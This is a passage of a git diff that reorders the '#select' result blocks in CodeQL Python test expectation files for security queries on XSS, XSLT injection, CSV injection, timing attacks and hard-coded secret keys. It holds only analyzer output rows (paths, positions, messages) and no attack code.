vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. 
| sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | edges | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:1:19:1:25 | ControlFlowNode for request | provenance | | | flask_mail.py:1:19:1:25 | ControlFlowNode for request | flask_mail.py:13:22:13:28 | ControlFlowNode for request | provenance | | 
@@ -92,3 +77,18 @@ nodes | smtplib_bad_via_attach.py:23:5:23:8 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | subpaths +#select +| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | +| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. 
| flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. 
| sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected index 28c85388a97f..8d960a22dfde 100644 
--- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected 
@@ -1,10 +1,3 @@ -#select -| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. 
| xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | edges | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:3:26:3:32 | ControlFlowNode for request | provenance | | | xslt.py:3:26:3:32 | ControlFlowNode for request | xslt.py:10:17:10:23 | ControlFlowNode for request | provenance | | 
@@ -129,3 +122,10 @@ nodes | xsltInjection.py:46:38:46:48 | ControlFlowNode for xsltStrings [List element] | semmle.label | ControlFlowNode for xsltStrings [List element] | | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | semmle.label | ControlFlowNode for xslt_root | subpaths +#select +| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. 
| xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected index 3fa27edd5211..7798cdda143c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected @@ -1,5 +1,3 @@ -#select -| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | edges | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | provenance | | | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | provenance | AdditionalTaintStep | @@ -8,3 +6,5 @@ nodes | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | semmle.label | ControlFlowNode for Fstring | subpaths +#select +| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected index aa90dfaeea0d..5152f7353f25 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected @@ -1,7 +1,3 @@ -#select -| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | edges | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:9:19:9:25 | ControlFlowNode for request | provenance | | | csv_bad.py:9:19:9:25 | ControlFlowNode for request | csv_bad.py:16:16:16:22 | ControlFlowNode for request | provenance | | 
@@ -30,3 +26,7 @@ nodes | csv_bad.py:24:16:24:38 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | semmle.label | ControlFlowNode for csv_data | subpaths +#select +| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected index bd32259294e0..1577182b2dcd 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected 
@@ -1,6 +1,3 @@ -#select -| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | -| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | 
@@ -12,3 +9,6 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths +#select +| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | +| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected index 0d3ebb1cf116..0b7b2de8ddb9 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected @@ -1,4 +1,3 @@ -#select edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | 
@@ -10,3 +9,4 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths +#select diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected index 25e04cafb6f8..14c8b8bf1eb1 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected @@ -1,6 +1,6 @@ -#select -| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | edges nodes | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected index b65708ca34e4..80b074348966 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected 
@@ -1,9 +1,9 @@ -#select -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | edges | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | provenance | | nodes | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths +#select +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. 
| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected index 2054ba4a231d..00c32be4267c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected 
@@ -1,13 +1,3 @@ -#select -| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. 
| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | -| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | edges | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | provenance | | | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | provenance | | 
@@ -42,3 +32,13 @@ nodes | config.py:18:18:18:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | config.py:18:43:18:51 | ControlFlowNode for aConstant | semmle.label | ControlFlowNode for aConstant | subpaths +#select +| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. 
| app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | +| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | +| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | 